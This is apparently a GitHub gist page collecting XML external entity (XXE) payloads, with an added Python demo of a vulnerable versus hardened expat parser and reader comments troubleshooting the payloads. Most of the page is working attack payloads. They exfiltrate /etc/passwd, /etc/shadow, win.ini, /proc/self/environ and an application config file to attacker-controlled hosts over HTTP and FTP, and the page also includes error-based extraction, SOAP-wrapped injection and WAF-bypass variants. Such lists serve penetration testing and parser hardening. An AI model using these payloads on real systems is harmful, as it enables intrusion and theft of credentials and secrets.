Last active October 8, 2024 15:20
XXE Payloads
Vanilla, used to verify outbound XXE or blind XXE: a request for test.txt on your listener confirms the parser resolves external entities
<?xml version="1.0" ?>
<!DOCTYPE r [ <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> ]>
<r>&sp;</r>
OoB extraction
<?xml version="1.0" ?>
<!DOCTYPE r [ <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; ]>
<r>&exfil;</r>
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
(A parameter-entity reference such as %data; inside an entity value is only legal in the external DTD, which is why the second stage has to live on your server. The file contents travel in the query string, so a multi-line file or characters that are not URL-safe can make the parser reject the URL instead of requesting it.)
OoB variation of above (seems to work better against .NET): exfil is declared as a parameter entity and referenced from the internal subset, so nothing has to be referenced in the document body
<?xml version="1.0" ?>
<!DOCTYPE r [ <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; %exfil; ]>
<r></r>
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
OoB extraction, FTP variant (the file contents travel in the FTP URL path instead of an HTTP query string)
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp; %param3; %exfil; ]>
<r></r>
## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">
OoB extra ERROR -- Java (error-based: the non-existent /nothere/ path makes the parser throw a file-not-found exception whose message contains the expanded %data3;, i.e. the file contents)
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp; ]>
<r></r>
## External dtd: ##
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%data3;">'> %param1; %external;
OoB extra nice (the external DTD builds a general entity that wraps the target file in CDATA, so an XML file can be read back through the application's response without the parser choking on its markup)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>
## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">
File-not-found exception based extraction
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one; %two; %four; ]>
<test></test>
## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
The % before "four" in the line above may need to be written as &#x25; (depends on your target): a bare % inside an entity value is read as the start of a parameter-entity reference, and stricter parsers reject it.
OoB extraction of /proc/self/environ over FTP
<?xml version="1.0" ?>
<!DOCTYPE r [ <!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> %asd; %c; ]>
<r>&rrr;</r>
## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
Inside SOAP body (the DOCTYPE is hidden in a CDATA section, so the outer SOAP parser sees only text; it fires when the service extracts that text and parses it as XML a second time)
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
Untested - WAF Bypass (unusual but legal DOCTYPE names; {0xdfbf} presumably stands for the raw bytes DF BF, the UTF-8 encoding of U+07FF)
<!DOCTYPE :. SYSTEM "http://"
<!DOCTYPE :_-_: SYSTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"
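Added example, not part of staaldraad's gist: the vanilla payload above fed to Python's standard-library expat parser, first in a configuration that resolves external entities the way a vulnerable parser does, then in one that refuses entity declarations outright (which stops every variant on this page, since each starts with an <!ENTITY ...> declaration). The secret file, its contents and the root element r are constructed for the demo, and the gist's callback host is replaced by a local file:// URL so it runs offline on a POSIX system.

```python
# Added example (not from the gist): vulnerable vs. hardened handling of the
# vanilla XXE payload with Python's stdlib expat bindings.  The secret file,
# its contents and the <r> root element are constructed for this demo; the
# file:// path layout assumes POSIX.
import os
import tempfile
import urllib.request
from xml.parsers import expat


def make_payloads():
    """Write a constructed secret file; return (vanilla_xml, oob_xml, secret).

    vanilla_xml is the gist's first shape (external general entity referenced
    in the body, pointed at the local file instead of a callback host).
    oob_xml is the parameter-entity shape of the OoB payloads, kept with the
    gist's placeholder host: it is only used to show that the hardened parser
    rejects it before any request could be made.
    """
    secret = "CONSTRUCTED-SECRET db_password=hunter2"
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(secret)
    vanilla = (
        '<?xml version="1.0" ?>\n'
        '<!DOCTYPE r [ <!ENTITY sp SYSTEM "file://{0}"> ]>\n'
        '<r>&sp;</r>\n'
    ).format(path).encode()
    oob = (
        '<?xml version="1.0" ?>\n'
        '<!DOCTYPE r [ <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; ]>\n'
        '<r></r>\n'
    ).encode()
    return vanilla, oob, secret


def parse_vulnerable(xml_bytes):
    """What a legacy or misconfigured parser does with &sp;: open the SYSTEM
    URL, parse the response as an external entity and splice its text into
    the document.  urlopen speaks file://, http:// and ftp://, exactly the
    schemes the payloads above rely on."""
    text = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = text.append

    def resolve(context, base, system_id, public_id):
        with urllib.request.urlopen(system_id) as fh:
            body = fh.read()
        # The sub-parser inherits the handlers, so the file lands in `text`.
        parser.ExternalEntityParserCreate(context).Parse(body, True)
        return 1

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(xml_bytes, True)
    return "".join(text)


class EntityRejected(ValueError):
    """Raised before any entity can be expanded or fetched."""


def parse_hardened(xml_bytes):
    """Fail closed: any <!ENTITY ...> declaration, general or parameter,
    internal or external, aborts the parse at the declaration, so no URL is
    ever opened and no entity value is ever expanded."""
    text = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = text.append

    def refuse(name, is_pe, value, base, system_id, public_id, notation):
        kind = "parameter" if is_pe else "general"
        raise EntityRejected("%s entity %r declared (SYSTEM=%r)" % (kind, name, system_id))

    parser.EntityDeclHandler = refuse
    parser.Parse(xml_bytes, True)
    return "".join(text)


def rejects(xml_bytes):
    """True if parse_hardened refuses the document."""
    try:
        parse_hardened(xml_bytes)
    except EntityRejected:
        return True
    return False


if __name__ == "__main__":
    vanilla, oob, secret = make_payloads()
    print("vulnerable parser returned:", parse_vulnerable(vanilla))
    for payload in (vanilla, oob):
        print("hardened parser rejects payload:", rejects(payload))
    print("hardened parser on clean XML:", parse_hardened(b"<r>safe</r>"))
```

Rejecting the declaration rather than merely not fetching matters for the CDATA and error-based variants above: those need the DTD stage to run, and a parser that silently skips external entities but still processes the internal subset may still resolve parameter entities it was asked to ignore.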

galaris commented Aug 10, 2017

pull request to seclist pls? :)


Xyberonz commented Mar 2, 2020

really good~ thanks


adamczi commented Apr 2, 2020

The <!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'> part might not work if your XML parser doesn't do URL encoding ootb (will report "incorrect url").


@adamczi any workaround if the XML parser doesn't do URL encoding ootb?


adamczi commented Jul 16, 2020

@Shapa7276 haven't found one; it's just that it accepts only alphanumeric stuff in there, so if you can somehow filter out special chars, it will work normally.


Hello guys,
Firstly, thank you for this work. I tried this kind of payload and I'm stuck:

Parser payload:

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://@evilServer:8000/ev.dtd">
    %ext; %eval; %error;
]>
<message></message>

External ev.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">

Evil server log:
[31/Jul/2020 13:05:07] "GET /ev.dtd HTTP/1.0" 200 -

Error message on the server:

File "http://EvilServer:8000/ev.dtd", line 2
lxml.etree.XMLSyntaxError: Detected an entity reference loop, line 2, column 77

Can you help me please?


dozernz commented Aug 31, 2020

@staaldraad there is an error in the "OoB extra ERROR -- Java" payload - the DTD file should say "file:///nothere/%data3;" as the %payload entity doesn't exist.


ghost commented Apr 15, 2021

Thanks, it's useful
